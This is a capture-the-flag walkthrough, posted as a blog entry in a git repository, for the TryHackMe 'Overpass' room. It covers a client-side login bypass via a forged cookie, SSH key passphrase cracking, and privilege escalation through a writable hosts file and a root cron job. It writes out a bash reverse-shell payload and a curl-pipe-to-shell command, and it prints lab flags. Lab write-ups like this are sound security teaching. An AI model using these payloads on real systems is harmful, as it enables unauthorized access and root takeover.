devoalda
/
devoalda.gitlab.io
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
devoalda.gitlab.io/content/en/posts/TryHackMe/2023-12-23-Overpass.md

187 lines
6.3 KiB
Markdown
Executable File
Raw Blame History

---
layout: post
title: TryHackMe - Overpass
date: '2023-12-23 10:29:32 +0800'
categories: [CTF, TryHackMe]
tags: [ctf,tryhackme]
math: true
libraries:
- mathjax
math: true
description: Overpass Room in TryHackMe
---
# Description
What happens when a group of broke Computer Science students try to make a password manager?
Obviously a perfect commercial success!
# Enumeration
### Nmap Scan
```bash
nmap -p- -T5 $IP
```
```text
Nmap scan report for 10.10.88.227
Host is up (0.19s latency).
Not shown: 64807 closed tcp ports (conn-refused), 726 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
```
### Dirbuster Scan
{{< img src="/images/Overpass/Dirbuster.png" title="Dirbuster Scan" caption="Administrator Page found!" alt="" width="700px" position="center" >}}
Looks like there is a route to `http://10.10.88.227/admin.html`.
Inspecting the sources (`login.js`), we can see the vulnerable code block:
{{< img src="/images/Overpass/Vulnerable_code.png" title="Vulnerable Code Block" caption="Look at the `else` block" alt="" width="700px" position="center" >}}
The `if-else` blocks only checks for "Incorrect Credentials" in the POST response, we could probably modify the response via Burpsuite to force a creation of a `SessionToken` cookie (or manually create 1 ourselves).
# Burpsuite Intercept
{{< img src="/images/Overpass/Burpsuite_Req.png" title="Burpsuite" caption="Modify Burpsuite Response" alt="" width="700px" position="center" >}}
Intercepting the traffic, we can get the `Response to this request` in the ui:
{{< img src="/images/Overpass/Burpsuite_mod_response.png" title="Burpsuite" caption="Response to this request" alt="" width="700px" position="center" >}}
Forwarding the traffic, we can see the modified response
{{< img src="/images/Overpass/Burpsuite_mod_response_recv.png" title="Burpsuite" caption="Modified Request" alt="" width="700px" position="center" >}}
We can then try to refresh the page in Burpsuite's Browser and find that we are logged in!
{{< img src="/images/Overpass/Overpass_Login_landing.png" title="Overpass" caption="Successful Login!" alt="" width="700px" position="center" >}}
We can see that a `SessionToken` cookie is created in the browser
{{< img src="/images/Overpass/Mod_session_cookie.png" title="Burpsuite" caption="Modified Session Key" alt="" width="700px" position="center" >}}
Looks like an SSH RSA Private Key. We might be able to use this to access the server?
# SSH
Trying this:
```bash
ssh -i james@$IP
```
I get the following response:
{{< img src="/images/Overpass/failed_ssh.png" title="SSH" caption="SSH Requires a passphrase" alt="" width="700px" position="center" >}}
## Cracking the SSH key passphrase
I first used `ssh2john` to convert it to a key hash:
```bash
ssh2john james.key > james.key.hash
```
Removing the `rsa.key:` from the hash, and using hashcat to identify the id of the hash to crack:
{{< img src="/images/Overpass/key_to_hash.png" title="SSH" caption="Hash Generation and Identification" alt="" width="700px" position="center" >}}
I then use `hashcat` to crack the hash with the `rockyou` wordlist:
```bash
hashcat -m 22931 james.key.hash /usr/share/wordlists/rockyou.txt
```
{{< img src="/images/Overpass/cracked_key.png" title="SSH" caption="Cracked Key!" alt="" width="700px" position="center" >}}
Passphrase: `james13`
## Login attempt
Using the same command, I tried to SSH into the machine with the key and passphrase:
{{< img src="/images/Overpass/successful_ssh.png" title="SSH" caption="Successful Login with the passphrase!" alt="" width="700px" position="center" >}}
We got the user flag:
```text
thm{65c1aaf000506e56996822c6281e6bf7}
```
# Privilege Escalation
Using Linpeas, we can find possible routes to privilige escalation. Following [this tutorial](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS#quick-start), I started a webserver in the host machine and curl-ed the script in the victim machine:
```bash
curl $HOST-IP/linpeas.sh | sh
```
### Crontab
{{< img src="/images/Overpass/linpeas_crontab.png" title="Linpeas" caption="Crontab" alt="" width="700px" position="center" >}}
Looks like the final line in the crontab runs as `root`, getting a bash script from a particular server and executing it
### Hosts File
{{< img src="/images/Overpass/linpeas_host_file.png" title="Linpeas" caption="Host File" alt="" width="700px" position="center" >}}
The hosts file seems to be writable by everyone. Looks like I could modify the `overpass.thm` in the hosts file to do a callback to the host machine to run a malicious callback script.
## Escalation Process
We first created the necessary directories and `buildscript.sh` file:
```bash
mkdir downloads
mkdir downloads/src
vim downloads/src/buildscript.sh
# Create the file with this as content:
# bash -i >& /dev/tcp/HOST-IP/5555 0>&1
# bash -i >& /dev/tcp/10.17.101.177/5555 0>&1
# Just in case (Probably don't have to do this)
chmod +x downloads/src/buildscript.sh
```
and also started 2 servers:
```bash
# Start the netcat listener
nc -lvnup 5555
# Python Http Server
# sudo python3 -m http.server 80
# Python2 Http Server
python2 -m SimpleHTTPServer 80
```
It doesn't seem like the Python3 server works, so I used python2 with `SimpleHTTPServer` instead.. (More info later)
The script used was a `bash reverse shell`, folloing the tutorial [here](https://ioflood.com/blog/bash-reverse-shell/), I created the file with this as the content:
```text
#!/bin/bash
bash -i >& /dev/tcp/10.17.101.177/5555 0>&1
```
In the Victim Machine, I modified the hosts file
```text
10.17.101.177 overpass.thm
```
{{< img src="/images/Overpass/modified_hosts.png" title="Hosts File" caption="Modifed Hosts file in victim machine" alt="" width="700px" position="center" >}}
And then we wait.. The script will be executed after the request from crontab.
{{< img src="/images/Overpass/python_web_server.png" title="Python Web Server" caption="Python3 doesn't seem to work" alt="" width="700px" position="center" >}}
After a few seconds, we get a reverse shell running as root! We can get the root flag from the current directory:
{{< img src="/images/Overpass/root_flag.png" title="Root" caption="Root Flag!" alt="" width="700px" position="center" >}}
We can see that we are root, the `root.txt` flag is in the directory and we can get the root flag!
Reference in New Issue View Git Blame Copy Permalink